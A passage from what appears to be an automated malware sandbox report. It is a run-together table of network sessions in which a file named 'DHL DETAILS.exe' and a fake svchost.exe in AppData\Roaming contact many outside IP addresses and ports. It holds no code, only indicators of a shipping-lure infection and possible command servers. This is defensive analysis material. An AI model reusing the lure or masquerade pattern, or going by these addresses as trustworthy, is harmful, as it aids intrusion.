                                                                                    7335192.168.2.549163185.162.229.708056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7336192.168.2.565520185.110.190.998043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7337192.168.2.563708171.244.140.1601752556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7338192.168.2.565500216.9.224.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7339192.168.2.565506218.65.6.150312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7340192.168.2.54916181.169.187.1948056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7341192.168.2.564844103.102.141.39414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7342192.168.2.56552127.65.114.8108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7343192.168.2.561860128.199.196.314167256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7344192.168.2.564924148.72.209.1743808856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7345192.168.2.56486013.234.24.116108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7346192.168.2.562183190.111.209.207312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7347192.168.2.56530968.71.247.130414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7348192.168.2.549209104.18.20.1608056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7349192.168.2.564899123.241.210.1238056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7350192.168.2.549225172.67.181.588056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7351192.168.2.549245104.24.236.2038056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7352192.168.2.549243104.18.161.1228056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7353192.168.2.549272104.20.89.778043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7354192.168.2.562145182.93.80.3829156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7355192.168.2.564159162.240.231.2114116656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7356192.168.2.56397472.217.158.202414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7357192.168.2.549302192.154.246.96900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7358192.168.2.56240751.158.105.2031637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7359192.168.2.55716937.187.141.1602906443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7360192.168.2.562374156.67.214.2328056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7361192.168.2.54924720.24.43.214812343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7362192.168.2.54926691.65.102.608043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7363192.168.2.54935374.119.147.209414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7364192.168.2.549394104.21.218.1038056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7365192.168.2.5492948.210.80.1911567343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7366192.168.2.54930346.17.63.166415456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7367192.168.2.549298122.51.123.2198056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7368192.168.2.54933123.137.248.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7369192.168.2.562518163.172.153.1941637956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7370192.168.2.54928727.72.122.2285106756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7371192.168.2.549324103.166.141.742007443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7372192.168.2.54931582.137.244.2448056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7373192.168.2.549388185.110.190.998043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7374192.168.2.565308103.48.68.1018356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7375192.168.2.54942368.71.247.130414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7376192.168.2.549417114.129.2.82808156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7377192.168.2.563040192.111.137.35414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7378192.168.2.549399216.9.224.1138056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7379192.168.2.549552192.154.246.96900043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7380192.168.2.55783837.156.146.163312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7381192.168.2.5494028.219.179.2371567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7382192.168.2.54948851.15.242.202888843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7383192.168.2.556483204.199.120.2899943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7384192.168.2.556450103.130.218.135400243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7385192.168.2.560937192.99.207.1294452343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7386192.168.2.54942845.11.95.166600856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7387192.168.2.549526103.197.71.78043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7388192.168.2.561209177.234.244.1743221343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7389192.168.2.561157198.89.91.90567843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7390192.168.2.561337162.241.46.406435343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7391192.168.2.561345102.215.197.202999943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7392192.168.2.561288177.234.194.15599943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7393192.168.2.561326192.145.228.212808143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7394192.168.2.561369103.174.102.1278043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7395192.168.2.56148054.36.122.162979643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7396192.168.2.56149220.42.119.478043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7397192.168.2.549483119.23.148.1738043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7398192.168.2.549539118.184.157.1118043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7399192.168.2.54944864.43.89.82634156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7400192.168.2.557602209.222.97.301948143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7401192.168.2.561837217.112.80.2528043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7402192.168.2.55791891.134.140.1603289643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7403192.168.2.558085185.108.141.114808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7404192.168.2.564556125.227.225.157338956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7405192.168.2.54957738.162.3.50312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7406192.168.2.56543843.133.136.208880043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7407192.168.2.549374180.250.159.49415356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7408192.168.2.549492223.113.80.158909143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7409192.168.2.56511398.181.137.80414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7410192.168.2.54956595.56.254.139312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7411192.168.2.54918692.204.135.37862343080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7412192.168.2.56270745.11.95.166601256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7413192.168.2.549779172.67.181.144806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7414192.168.2.54964246.17.63.166415456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7415192.168.2.5496378.210.80.1911567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7416192.168.2.549205188.132.221.163808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7417192.168.2.565528172.105.52.783110656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7418192.168.2.54928268.71.254.6414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7419192.168.2.54964623.137.248.1978056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7420192.168.2.549741185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7421192.168.2.549701103.166.141.742007443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7422192.168.2.558297107.180.88.415764243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7423192.168.2.54982545.43.81.4456916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7424192.168.2.564852184.178.172.17414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7425192.168.2.549960193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7426192.168.2.5499558.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7427192.168.2.549693111.59.4.88900243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7428192.168.2.550033212.33.205.4281186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7429192.168.2.550264119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7430192.168.2.54926977.65.50.1183415943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7431192.168.2.549301139.198.120.152952756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7432192.168.2.55859380.169.243.234108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7433192.168.2.550532162.159.241.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7434192.168.2.549365103.70.206.1295931143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7435192.168.2.558561109.87.130.6567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7436192.168.2.550713184.72.36.89806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7437192.168.2.56460660.188.102.2251808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7438192.168.2.55126743.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7439192.168.2.550449162.120.71.11806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7440192.168.2.55127043.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7441192.168.2.55127643.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7442192.168.2.55128343.134.230.1224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7443192.168.2.550360107.180.89.185490626352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7444192.168.2.550912104.25.87.42806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7445192.168.2.549414218.65.6.150312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7446192.168.2.550919104.16.195.74806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7447192.168.2.54964768.71.247.130414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7448192.168.2.551107188.114.99.171806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7449192.168.2.55034623.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7450192.168.2.550399103.162.141.154856352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7451192.168.2.550577103.69.87.14231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7452192.168.2.550372185.191.236.16231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7453192.168.2.551287172.67.219.60806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7454192.168.2.54949891.134.140.160887943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7455192.168.2.55056543.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7456192.168.2.551024195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7457192.168.2.549698192.111.137.35414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7458192.168.2.551246193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7459192.168.2.551252185.100.233.101411386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7460192.168.2.55158950.63.12.33346446352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7461192.168.2.54959694.131.14.66108143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7462192.168.2.563006170.245.132.1599956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7463192.168.2.55130651.222.241.157440296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7464192.168.2.551291217.23.11.194327086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7465192.168.2.55137867.43.236.20182036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7466192.168.2.563024195.248.243.149723756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7467192.168.2.551903148.72.23.56361116352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7468192.168.2.55172794.131.59.241583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7469192.168.2.55138047.100.207.11780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7470192.168.2.5517148.211.4.215806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7471192.168.2.551609176.119.25.1331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7472192.168.2.55170689.168.121.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7473192.168.2.56511234.83.143.6312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7474192.168.2.55224098.178.72.21109196352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


